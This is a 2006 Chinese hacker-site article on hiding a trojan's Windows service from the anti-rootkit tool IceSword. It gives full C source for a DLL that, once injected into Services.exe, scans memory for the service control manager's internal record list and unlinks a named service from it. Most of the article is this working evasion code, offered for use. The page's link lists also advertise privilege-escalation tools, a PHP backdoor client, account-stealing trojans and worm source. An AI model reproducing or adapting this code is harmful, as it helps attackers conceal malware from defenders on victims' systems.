·	没有路由密码权限时的鸽	08-23	·	上网安全 Vista自我防范	10-11
·	让濒临崩溃的Windows XP	10-11	·	有备无患，快速自制救急	10-11
·	要你好看!Windows看图工	10-11	·	空间赞助网提供不同类型	10-11
·	讨论net.exe和net1.exe的	10-10	·	让3389远程桌面传输更通	10-10
·	巧妙入侵渗透赌博站	10-10	·	Aspx空间扫权限工具	10-10
·	Windows2003最新提权工具	10-10	·	易淘乐提供100M免费全能	10-10
·	系统开机密码忘了不着急	10-09	·	中意网络提供免费100M免	10-09
·	与众不同 Windows XP开始	10-08	·	让桌面图标翻跟斗在XP上	10-08
·	上海宽元站长资助计划-提	10-08	·	个性化Windows XP的任务	10-07
·	趣盘提供3G免费网络硬盘	10-07	·	秀山热线提供200MB免费全	10-07
·	一次艰辛的提权过程	10-06	·	成功入侵IT大卖场的渗透	10-06
·	mysqlhack- MYSQL利用工	10-06	·	lanker一句话PHP后门客户	10-06
·	WIXI提供3G免费多媒体网	10-06	·	新人网络提供100M/ftp免	10-06
·	如何利用QQ带来高流量	10-05	·	UuShare提供免费网络文件	10-05

[推荐]在冰刃下隐藏木马的服务项

热荐 ★★★★

在冰刃下隐藏木马的服务项

文章整理发布：黑客风云文章来源：www.05112.com 更新时间：2006-6-2 10:16:20

上次看到wineggdrog有在讨论icesword是如何检测服务的。
虽然我不知道icesword是什么样列举服务的，但估计最终也是通过历遍SCM内部的ServiceRecordList来检测。
为什么呢？看下面。
用附件中的InjectDLL.exe把hideservice.dll注入到Services.exe进程后就会把Alerter服务隐藏掉。用icesword也检测不出Alerter服务了。
代码原理很简单，就是在Services.exe进程找到ServiceRecordList表,将需要隐藏的服务从链表上断开。
既然icesword也检测不出了，那就说明icesword最终也是通过历遍SCM内部的ServiceRecordList来检测.
好像最先是听到EVA讲的。
以下是dll的代码，网上找到的,拿来就用。
Codz:
#include
#include
#include

typedef struct _FAKE_SERVICE_RECORD {
     struct _FAKE_SERVICE_RECORD *Prev;          // linked list
     struct _FAKE_SERVICE_RECORD *Next;          // linked list
     LPWSTR                  ServiceName;    // points to service name
     LPWSTR                  DisplayName;    //
} FAKE_SERVICE_RECORD, *PFAKE_SERVICE_RECORD, *LPFAKE_SERVICE_RECORD;

void seArchDWORD(int Addr);
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReAson,LPVOID lpvReserved)
{
switch (fdwReAson){

case DLL_PROCESS_ATTACH:
   {
    FILE* pFile;
    pFile = fopen("c:\\seArch.txt","a+");
    fputs("begin\n",pFile);
    fclose(pFile);
    int i;
    for (i = 0x300000;i<0x5000000;i+=4){
     printf("%x\n",i);
     __try{
      if (0 == wcscmp((const unsigned short *)i,L"Alerter")){
       char temp [32];
       sprintf(temp,"found Alerter At: %x\n",i);
       FILE* pFile;
       pFile = fopen("c:\\seArch.txt","a+");
       fputs(temp,pFile);
       fclose(pFile);
       seArchDWORD(i);
       //break;
      }
     }
     __except(EXCEPTION_EXECUTE_HANDLER ){
      printf("error\n");
      i-=4;
      i += 0x1000;
      //_getche();
     }
    }

   }
case DLL_THREAD_ATTACH:
   break;
case DLL_THREAD_DETACH:
   break;
case DLL_PROCESS_DETACH:
   break;
}
return TRUE;
}
//--------------------------------------------------------------------
void seArchDWORD(int Addr)
{
int i;
for (i = 0x300000;i<0x5000000;i+=4){
   printf("%x\n",i);
   __try{
    if (Addr == *(ULONG*)i){
     char temp [32];
     sprintf(temp,"found the point At: %x\n",i);
     FILE* pFile;
     pFile = fopen("c:\seArch.txt","a+");
     fputs(temp,pFile);
     fputws((const unsigned short *)(*(ULONG*)(i+4)),pFile);
     fputs("\n",pFile);
     fclose(pFile);
     //break;
     if (0 == wcscmp((const unsigned short *)(*(ULONG*)(i+4)),L"Alerter")){
      //found the right one
      PFAKE_SERVICE_RECORD pRecord;
      pRecord = (PFAKE_SERVICE_RECORD)(i-8);
      *((DWORD*)pRecord->Prev+1) = (DWORD)(pRecord->Next);
      *((DWORD*)pRecord->Next) = (DWORD)(pRecord->Prev);
      }
    }
   }
   __except(EXCEPTION_EXECUTE_HANDLER ){
    printf("error\n");
    i-=4;
    i += 0x1000;
    //_getche();
   }
}

}

文章录入：cainiaowang 责任编辑：sygbox

上一篇文章： c#.net如何获取本机ip

下一篇文章：从进程中获取QQ号码

【字体：小大】

中介交易区

网游盗号木马实现手记	01-09
黑色技术蠕虫下载者[完整源码]	11-01
利用BCB自己打造QQ炸弹	10-23
从内存中加载并启动一个exe(delp	09-27
开启和关闭Windows xp 防火墙(de	09-27
让你的程序通过XP防火墙(delphi编	09-27
如何让你的程序安全通过windows防	08-20
如何透过程序来控制 Windows (XP	08-20
动易2005-2006算号器的源代码	08-11
API对注册表进行操作(Delphi编程	07-30
一段隐藏注册表项的代码	07-26
了解VB编写病毒的大体方法	07-02